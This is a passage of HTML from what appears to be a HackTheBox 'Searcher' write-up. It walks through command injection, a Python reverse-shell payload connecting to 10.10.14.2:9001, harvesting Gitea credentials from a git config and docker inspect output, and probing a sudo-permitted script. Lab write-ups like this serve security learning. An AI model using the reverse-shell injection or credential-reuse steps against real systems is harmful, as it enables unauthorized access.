url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAiklEQVR42pWPOw7CMBBEfXFuQ8sF6GlpuAAXiB07/ol4d/BulAhBCvKkZ8myNDM26LTWEMKk1lpxBObFFSMHEcH7ADd6zHPTOxH/JX+mrYGycLAO1o1w3cFalFK39j17p3J/vnB9lG2lWWYzwhQ1LOWMGJMqRfK2p6wTzreE08WDvgOzBsWfLxzlDV3UiRC6kOWmAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="command execution payload" title="" src="/static/c83691cb86be8fb9ee53a71736db7d61/50637/command-execution-payload.png" srcset="/static/c83691cb86be8fb9ee53a71736db7d61/dda05/command-execution-payload.png 158w, /static/c83691cb86be8fb9ee53a71736db7d61/679a3/command-execution-payload.png 315w, /static/c83691cb86be8fb9ee53a71736db7d61/50637/command-execution-payload.png 630w, /static/c83691cb86be8fb9ee53a71736db7d61/fddb0/command-execution-payload.png 945w, /static/c83691cb86be8fb9ee53a71736db7d61/9efac/command-execution-payload.png 1030w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Output:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 450px; " > <a class="gatsby-resp-image-link" href="/static/ada63d4935ddde43f01a7928a759dc68/7f757/command-execution-output.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 12.658227848101264%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAeUlEQVR42q2MWQ6DMAxEc/8TlkATEuEskO2jSPmbGvcKtTTS0yxWMUYYY7AsLxARYkpwu0GICd45aK1h7I7EfggE7z2stUg5I9DB+Ypte8v2c99QvXeUUmRQa0VrjYvE/PPPM7MujDGEM+uQ/OlWyTI/r8xzTij8+b4Oq+P1MhOgBgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="command execution output" title="" src="/static/ada63d4935ddde43f01a7928a759dc68/7f757/command-execution-output.png" srcset="/static/ada63d4935ddde43f01a7928a759dc68/dda05/command-execution-output.png 158w, /static/ada63d4935ddde43f01a7928a759dc68/679a3/command-execution-output.png 315w, /static/ada63d4935ddde43f01a7928a759dc68/7f757/command-execution-output.png 450w" sizes="(max-width: 450px) 100vw, 450px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Knowing that I could get command execution, next I attempted to get a reverse shell. I modified the Python #2 payload from <a href="https://www.revshells.com/" target="_blank">revshells</a>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">'+exec("import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.10.14.2',9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.system('/bin/bash -i');"))#</code></pre></div> <p>The payload is altered to use the <code class="language-text">exec()</code> function to execute the python code and launches the shell with <code class="language-text">os.system('/bin/bash -i')</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/f700b8193370c98716c6f50a2663616e/3434a/rev-shell-payload.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.949367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAoElEQVR42p2PzQ7CIBCE+/7vYjzrc+hFzz3UWArlr0DZ6dIfk8YejJsMM1nYL2yFtay1kEpBa7O1QD9o5CPTZwTVFpxzEELMPqaEnDN25KOiFUv0DWyVQfOWeAmFuhEQykH7iN5FGJ/YAzTnopJ7G+CHiOuDcHke/LA8qJuWwXaGlCGpB5aHMgEd+5KXXsd31gec74TT7QBYVkwp7lf9oyZuzIfNdnPGWQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="rev shell payload" title="" src="/static/f700b8193370c98716c6f50a2663616e/50637/rev-shell-payload.png" srcset="/static/f700b8193370c98716c6f50a2663616e/dda05/rev-shell-payload.png 158w, /static/f700b8193370c98716c6f50a2663616e/679a3/rev-shell-payload.png 315w, /static/f700b8193370c98716c6f50a2663616e/50637/rev-shell-payload.png 630w, /static/f700b8193370c98716c6f50a2663616e/fddb0/rev-shell-payload.png 945w, /static/f700b8193370c98716c6f50a2663616e/3434a/rev-shell-payload.png 1068w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Shell as <code class="language-text">svc</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/88e89452acf959c14e3c27c2a119c37b/6150a/shell-user-flag.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 37.34177215189873%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABUElEQVR42mWR23KCMBRF+ZTKTfASUCQEEhAZq+K1fWif+v+/sbsDjg/tw5qTTOasnJ04iTxCNnek5RHV7gFVn7FRe8yERrTQEFmHWDSIRI3p0gwEswJBtMYkXMONNqwrvPkCEz+BY9o7zPaCsr5Ab68w7Q11++D+iqb7RHf8QsGzcntDrnvWO0pzgCSLrH0h8g7RUsHRbK6aUab0Gbq5cX9FReFGHTFdGHixgj+zlAjmFcI4Q7gsiUawsLXCVFTD2lHmjLpjVNMjK94pu3GyD8p7yLJHYcbpRLZj1JIRiyGajeryEo/x3dgih7Vjp7ncf3A4faOoToN0le+RULBc7ZBu9pin7TCdndTiTnNKBaUZ93Jk9hTKqh+a50nNj+CDs2ES8PYwJ5IPPuJF6iUcoNQN0j/wU9acyAoDju2x0WckK7XVp2Rcq//CF8UTe2mOX4w+4DEQ/eTdAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="shell connection and user flag" title="" src="/static/88e89452acf959c14e3c27c2a119c37b/50637/shell-user-flag.png" srcset="/static/88e89452acf959c14e3c27c2a119c37b/dda05/shell-user-flag.png 158w, /static/88e89452acf959c14e3c27c2a119c37b/679a3/shell-user-flag.png 315w, /static/88e89452acf959c14e3c27c2a119c37b/50637/shell-user-flag.png 630w, /static/88e89452acf959c14e3c27c2a119c37b/6150a/shell-user-flag.png 651w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I tried checking sudo permissions with <code class="language-text">sudo -l</code>, but it required a password which I didn't know yet:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 277px; " > <a class="gatsby-resp-image-link" href="/static/95c522ee298f262cad0a0c8d79e8ada4/b8799/sudo-l-password-required.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 14.556962025316455%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAwklEQVR42kWOwU6DQABE+yEmNoqtrVSgCwUWgbBLuwSKdBM1TYx+hAfvfvkTLu1hMslM8mZmUWLI8pbeflPVllKdqPSJunljGylk0bGThlwN1AfL2isIIs2dI7i9FzysYpzHq2YyP6IP7wwTUA8j0NK9fmLaD0x3Ru8t8UtL25+JZUNW9ohdTTN2P79/3Mw9Fuv0CnTHRV9UBEKx8Qs2QUkQ6jFThMme523J0pV4kz+l+KFi5WZEqeE4fDF3ppfJBfgP/39l+Y2Sjz0AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sudo -l password required" title="" src="/static/95c522ee298f262cad0a0c8d79e8ada4/b8799/sudo-l-password-required.png" srcset="/static/95c522ee298f262cad0a0c8d79e8ada4/dda05/sudo-l-password-required.png 158w, /static/95c522ee298f262cad0a0c8d79e8ada4/b8799/sudo-l-password-required.png 277w" sizes="(max-width: 277px) 100vw, 277px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So after some enumeration, I found a git repository in <code class="language-text">/var/www/app</code> which had a <code class="language-text">config</code> file that contained user credentials for Gitea hosted at <code class="language-text">gitea.searcher.htb</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 571px; " > <a class="gatsby-resp-image-link" href="/static/7a6c8acec2344e6612e81654a59612fa/0766b/git-repo.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 76.58227848101265%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAACt0lEQVR42lVT53qbQBDkVaxiJBAgijh6L5ZkS67Jl7z/e0xmT46d/NiPO+6YnbIYSXlC2V3hqx6WX8Dal3DCBu6h5bqC6WRY2wp39yGWm4jPAAvWcsO9GWJh3t4vtzGWloKRVmfE+QwvamHuUv3cegV2BHOCGrZfIUxG7OOe4Dlcnts8kwYLM2JJg/1n+TCK9oK0PPOjCYEa0U2vcMNWsxb2AlT1V+4fYbkZsuoBKhtheTnWVnxjrEF93K08GP3DByr5uDhBEeB0+Y1mfMVw/MB0+kGwZ/TzO5rhqpmW3TNykhh5FqUD7q0DFuv9rYRhycNufkPRPPHCRAYn1hlle/1irtjM8krc2ym2ZLndJbCcFLabw7QTMqR/20SXEaWjlhSpAW7QaLlBPFD+oNfCynILAuVkEN7KPFAq5ZoKi03yBaYB42zWjFy/YbeMJSwKbBjAZsc9a7WJsd4qPhUTZZmyTm8g1l+w9CZ5PP5ATQ9VdkTIUFr6J1IlLPFW1vJOmoZqQl7TmmQmM7Ij0J0Z65JGCwmlpukFL6n8SA9nBvFTJ9xJMPMHAR5R9y9M/w07r+L+Qn+fUQ9vyJoL9rTGCTsy5KyuXBg+xyI49Hq2vKBFTiYJwaWBsPF5to96vbbcku9PZP1E3181YEC2btRp2Ys1GYokRR9dDrGEMdGCggm345tmqLIHeGTQUIlNwKQ43xgSMKSiHUl8BUPpRjO8oGT3A0cm4ojMlCwedQQUEPGt4ccj59Xxa/r6optN51/YMUjxb2Wl3ynXMqhkGRMwpB/iXUxWMocVS9bd9A7x2uYsZtUjZ/aqa+OUHCH1/9gU9EFkiY9SFdOVRMWKUv+WJx1KyXsCKH9UUV80U0+8E7n/zKIhF9tP2RKEMBRm4l9JFuLpTHkSmMylQ5keB94LOs5s/g34WX8A01/zKMJMORIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt=".git repo" title="" src="/static/7a6c8acec2344e6612e81654a59612fa/0766b/git-repo.png" srcset="/static/7a6c8acec2344e6612e81654a59612fa/dda05/git-repo.png 158w, /static/7a6c8acec2344e6612e81654a59612fa/679a3/git-repo.png 315w, /static/7a6c8acec2344e6612e81654a59612fa/0766b/git-repo.png 571w" sizes="(max-width: 571px) 100vw, 571px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3b27a17bc984204e75acbcadf50ce58e/4ad3e/user-creds.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.708860759493675%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABQUlEQVR42mWRaW6DMBSEuQqQBMcsYTVL2BKyq0pbqb3/UaZjEypV/TGyjO3vzQxW1d4xTJ9QzQ0ibBEkA9XDj3sE8YAtv4XxCBG0cL0SrqjgbhfVcNYpHJHDldzLElYQd5BRh1SdkFcXxPkRWXlGlI4E9hB+A3tTGNhKw/4BY648l7WBWg4vr0SJ7vCO8fiB/vBETqBHkHanz1xPGaCzSCyqYK8T2KsdHLrTsrSThK6a7kHoEzXXpDgZp9q13DE+FeoqdPSwYx0DJOUno5EMKw5X8LhaaTEh4uU4O5iY+mFKhzp2ps4omzvK/ay6fUOUHQ1Msg5fD0ln6DbaMxUdhjwM6KBn3IqPEg4oqqvpT8deousuJd3pHp2N+o1uC/XSvCewN06GSQNvJvZ0+ULVPjBdvwlp2VP+6lEZ4KK/P2jWD3hZ3soWxkguAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="user-creds" title="" src="/static/3b27a17bc984204e75acbcadf50ce58e/50637/user-creds.png" srcset="/static/3b27a17bc984204e75acbcadf50ce58e/dda05/user-creds.png 158w, /static/3b27a17bc984204e75acbcadf50ce58e/679a3/user-creds.png 315w, /static/3b27a17bc984204e75acbcadf50ce58e/50637/user-creds.png 630w, /static/3b27a17bc984204e75acbcadf50ce58e/4ad3e/user-creds.png 669w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After logging in to the <code class="language-text">cody</code> user's Gitea page, it only contained the repo for the Searcher site, which wasn't too useful because I was able to view that code anyway. However, I noticed another user contributing to the Searcher site repo named <code class="language-text">administrator</code> so I took note of that as I figured it might be useful at some point:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/cf0bcf78f825409cccad2e6eac65013b/f3baa/searcher-site.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 57.59493670886076%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABpklEQVR42q2Sy3KjMBBF+Z1JbDAgkACJpwy2wTw8qcws8/8/cdOSTeykUpVNFge1rkSX+nY7oaiwYxVC3sCPKgRxbVcvLOAG+Q2Fra8e9nd2rMQ2KFCUHWS+h2MTcfqZZYTEZpfh2bvz5KYf64q58+Qmlj+uoHPStxQTTqJOUOUZkdDgaYs4acG4/iCMG8saBxFVQBWteGFJ1Wn4dGZiR9YTsnpGUowQ+QCuegRJB5YewLKjjUPCj1sE4mD18Kax9AjzoDjZI047ins4jSgxigwXVWFMFAaeYRASiyyxkHa2msSrLvE2dxhiiZ6nlimRVN0EV81gOT1IHuFcXl4xL/9R6xl6P2HfLdDtBUV1RlmPqJqJ4hH9/BfTvxeookfZnG8MVFmPXC/ImwWcKnJUc6JSD9j4OaGwoc5tqcMheepRt593RlPUAEmmU7fpfPOAF+ZgokFE3gt5ghOTD6Z+Y6wlvq5GY6K966ZJQn/ar5hG8uxwTWg+BmPoI0Je+ap/x3r3U8Lf4vcTRqlGZAaaPONZZ9eIZiwwQ/wDPg15ZGeQ5jO5evwOIC6ZYPpCTDIAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Searcher_site" title="" src="/static/cf0bcf78f825409cccad2e6eac65013b/50637/searcher-site.png" srcset="/static/cf0bcf78f825409cccad2e6eac65013b/dda05/searcher-site.png 158w, /static/cf0bcf78f825409cccad2e6eac65013b/679a3/searcher-site.png 315w, /static/cf0bcf78f825409cccad2e6eac65013b/50637/searcher-site.png 630w, /static/cf0bcf78f825409cccad2e6eac65013b/fddb0/searcher-site.png 945w, /static/cf0bcf78f825409cccad2e6eac65013b/f46b1/searcher-site.png 1260w, /static/cf0bcf78f825409cccad2e6eac65013b/f3baa/searcher-site.png 1280w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I tried running <code class="language-text">sudo -l</code> again with the found password and it worked which showed that the <code class="language-text">svc</code> user could run <code class="language-text">/usr/bin/python3 /opt/scripts/system-checkup.py *</code> with root privileges:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/ebcc879f6be2bccdda24809cba9b6fc2/31682/sudo-l-with-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.21518987341772%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/0lEQVR42lWQ6W7CMBCE8ygVEWDnwDmIndPBOQiFUuj1/o8yXbsqVX982pG8Oztrr+mv6Mc7zPQGPdxQtmfsyyO2YU1U2FDlcQdG+KzEiqkfthJPfowVLwj1wBO5QXu4wszv6Ic7OnPDtHw581zOSIsJqjnTogui9IAg6RFlVIVGuGvAI0m6JkgTnk1ihxv9AhY1/9gEFdacUgY2bYM1VRa3NKjBROvMWWx7S0JRj4QXig5xqpHsB1gdJRoiH5AUI2z6XM0QmcEus3pxJj4vHX/nq4f2EmrU5hW1vmBcPun0D/eHRbWQwRGyPqEoF4esn+ntRItGl/TX2EFmPlf4Buw/odhCPvnJAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="sudo -l with password" title="" src="/static/ebcc879f6be2bccdda24809cba9b6fc2/50637/sudo-l-with-password.png" srcset="/static/ebcc879f6be2bccdda24809cba9b6fc2/dda05/sudo-l-with-password.png 158w, /static/ebcc879f6be2bccdda24809cba9b6fc2/679a3/sudo-l-with-password.png 315w, /static/ebcc879f6be2bccdda24809cba9b6fc2/50637/sudo-l-with-password.png 630w, /static/ebcc879f6be2bccdda24809cba9b6fc2/31682/sudo-l-with-password.png 670w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To get the correct usage, I ran the command with <code class="language-text">-h</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9d6b604674beeb65a0ffb9f830df560c/e899a/system-checkup-h.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 16.455696202531648%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAArUlEQVR42i1OWxKCMBDjKoAgCKNACy0tiA9weAyO979MjOBHZje72WQdZSaY6wxtZyg7Qbcz+QLdLFBmRFmPnM8bF/oFSY25rSjUC8nZEDXOokWSWQSnCs4hUriIO0qK06zDMTHI5AO5fEKoAUU1sO+Rlz05TagJUws/1vB464YSblCw5hscL5CQekDD1Jb4mW2fNvvHtlu5e6O9f2je48KgkKF+pDdTP67/2PkX+n9iS1IjClcAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="system-checkup.py -h" title="" src="/static/9d6b604674beeb65a0ffb9f830df560c/50637/system-checkup-h.png" srcset="/static/9d6b604674beeb65a0ffb9f830df560c/dda05/system-checkup-h.png 158w, /static/9d6b604674beeb65a0ffb9f830df560c/679a3/system-checkup-h.png 315w, /static/9d6b604674beeb65a0ffb9f830df560c/50637/system-checkup-h.png 630w, /static/9d6b604674beeb65a0ffb9f830df560c/e899a/system-checkup-h.png 682w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>First, I ran it with <code class="language-text">docker-ps</code> to list the running docker containers:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e4a5b512b4e8024f4c2c8210214c1bc3/7df1d/docker-ps.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 20.88607594936709%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA5UlEQVR42h1QW3KDMBDjLm0y4ekXGAzBDpiEJmma/vT+R1EFHzvyjkbSyontV3TDHbpdoJqZeIUw0z6F9ND2BtvfIeqIXAUUekJJTtUeogmobISkVrsrCnNBUnc3LOsfahpl1QhDPGYOp2LAIW1RqomBDxzzAR9pR5NlH2WJ+ozPk0YuB+4TDplFokmM0wtufKBxK99v+PmXV33t5sLM5L5xvrzh/At9+KE4IpMBktpKeWSlQy4GVAxIZD2j90/0NGxZLdBsw5L1JGt24xNbC2HiXtt0KwyDRRNZceZ1AWnl9+/Y5h92iYS3L/cL4AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="docker-ps" title="" src="/static/e4a5b512b4e8024f4c2c8210214c1bc3/50637/docker-ps.png" srcset="/static/e4a5b512b4e8024f4c2c8210214c1bc3/dda05/docker-ps.png 158w, /static/e4a5b512b4e8024f4c2c8210214c1bc3/679a3/docker-ps.png 315w, /static/e4a5b512b4e8024f4c2c8210214c1bc3/50637/docker-ps.png 630w, /static/e4a5b512b4e8024f4c2c8210214c1bc3/7df1d/docker-ps.png 702w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">docker-inspect</code> requires a format option and container name. Read more <a href="https://docs.docker.com/engine/reference/commandline/inspect/" target="_blank">here</a> in the documentation for docker inspect.</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/aea851f2dce1fd8cdd496e2e68a80536/7df1d/docker-inspect-usage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 6.962025316455696%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAARUlEQVR42mOwtPX57+QW/N/c2vO/qaX7fzMrDzAbRJtYuIFpCxsE39jS7b85kG9s4frfFKTWxuu/ibX7f11jh//aRvb/AWCJIjqDiqR3AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="docker-inspect usage" title="" src="/static/aea851f2dce1fd8cdd496e2e68a80536/50637/docker-inspect-usage.png" srcset="/static/aea851f2dce1fd8cdd496e2e68a80536/dda05/docker-inspect-usage.png 158w, /static/aea851f2dce1fd8cdd496e2e68a80536/679a3/docker-inspect-usage.png 315w, /static/aea851f2dce1fd8cdd496e2e68a80536/50637/docker-inspect-usage.png 630w, /static/aea851f2dce1fd8cdd496e2e68a80536/7df1d/docker-inspect-usage.png 702w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I ran <code class="language-text">docker-inspect</code> with the <code class="language-text">--format='{{json .Config}}'</code> option to format it as json. This outputted configuration info for the <code class="language-text">gitea</code> container which included a Gitea password, but there's no mention of what user it belonged to:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9c2127cf9558df9a47fb6162d1c14ce1/e134c/gitea-administrator-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.835443037974684%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABwklEQVR42j2SaY6jMBSEc59RFNIJYTfeMGYLS9K01Pe/R02ZjOZHyTwvj6/KPt2zFsq9kJQdKv1EUvUo5Yhc9CjqHmmo1YjorvDnUiC6CZyjHBcqiiWuWYPLw+CaWpzvEqdH4WH9G5WaoN3GpjNM+4bx36jMglROEM0KYRfE3JupmXoirgaUeoJsFySiQy57QnmcYhJavx+UhqrtCtuxGRs4Em51h4VNFzaaOf50OzauraQeC4vdzRiER9OtyCsXCDtINikEbdYDNX3qQMYYmtyjl084fvt6REt57hukhykc6wGWEcn2hTh3gdDT7sy8JmpEWvYQmg1pKeSbiIm0zJjrKa2mamG90r7FlRHkNsRCGBLHwXJa8g/Mq2Z2QaoJ1t9Hjvr43o+5oNqskBwLAghmJpsFimdLMx+EOe/hlBQ9D67HhYiwUS//x4pEhvnmpAwKzXT7jXb6PS4xKxu+gAHCTPzZExnzPmUkbIcfuH6HY+DSbh+Sf7kq2lWck837mK8DddhHF5kY6GQjPS+wf6GSbJgzq4LBpuFJML976vjmNL4eDUfDt8Y3FlvcEofzVeH8pTlnET0sLly7MeePHGuNv9AjQKTS9gtHAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="gitea administrator password" title="" src="/static/9c2127cf9558df9a47fb6162d1c14ce1/50637/gitea-administrator-password.png" srcset="/static/9c2127cf9558df9a47fb6162d1c14ce1/dda05/gitea-administrator-password.png 158w, /static/9c2127cf9558df9a47fb6162d1c14ce1/679a3/gitea-administrator-password.png 315w, /static/9c2127cf9558df9a47fb6162d1c14ce1/50637/gitea-administrator-password.png 630w, /static/9c2127cf9558df9a47fb6162d1c14ce1/e134c/gitea-administrator-password.png 704w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So, I tried logging in using this password with the only other user I saw on Gitea, <code class="language-text">administrator</code> and the creds worked. The user's profile contained the <code class="language-text">/scripts</code> repo which allowed me to view the code and check for any potential vulnerabilities:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/5255f636eee2d51681a5d73925190251/f3baa/gitea-scripts.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.65822784810127%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAABvUlEQVR42q2TzXabMBCFeZu0sQ0YySBshPgnkNpg1+452XTX93+E2xlhaJOctF108aHRlRiN7oAjVA5f5hBRie0uR7Ar7OgJAzdIFzZb/Wo+48uM1gzyqoXOGjicKIgMPJnA32lsggRr/4CVN/Ho7pdxhtcf3djy2VW0TvqGYsKJdQ+dH22FMq4g1BtIF1EFeZ9vw5IOLqiyCU/w7WqreyKDo7MTEjMg2veQYQNxZ6da4mnSogaBrCluaR/pcY2Q4DhOOoobhBzrL3AObQNzKVHdOmSXGmYskY4ViusTStLMuYYeanTfWww/Rvj6TAzEiMBcEJY3eOkISZpKejjj7RtO1xdk7Yi8HVB0Z+ICXZ2Q1icY0jjurl9xfLlhTzfS1YikZAbE2RFpdUZK8+jQUYWmp1I76mxhO8ndZS+mrhdTN0WKtaexcvW77nvSWH/5yrZCNjzcN2SwwcMqwqe1svCnwwc8rO/aRlEX1bI+w5316RDOYxOG1uTGElCnZqSq7abftY+YirpXyI+ZWD8vqOT51fxP8N6JNwn/B86c+df4vtq/V9gvN3L472D/eGQfZk//xbvZa36H3+du/wSoW7oBOulL+AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="gitea scripts" title="" src="/static/5255f636eee2d51681a5d73925190251/50637/gitea-scripts.png" srcset="/static/5255f636eee2d51681a5d73925190251/dda05/gitea-scripts.png 158w, /static/5255f636eee2d51681a5d73925190251/679a3/gitea-scripts.png 315w, /static/5255f636eee2d51681a5d73925190251/50637/gitea-scripts.png 630w, /static/5255f636eee2d51681a5d73925190251/fddb0/gitea-scripts.png 945w, /static/5255f636eee2d51681a5d73925190251/f46b1/gitea-scripts.png 1260w, /static/5255f636eee2d51681a5d73925190251/f3baa/gitea-scripts.png 1280w" sizes="(max-width: 630px) 100vw, 630px" 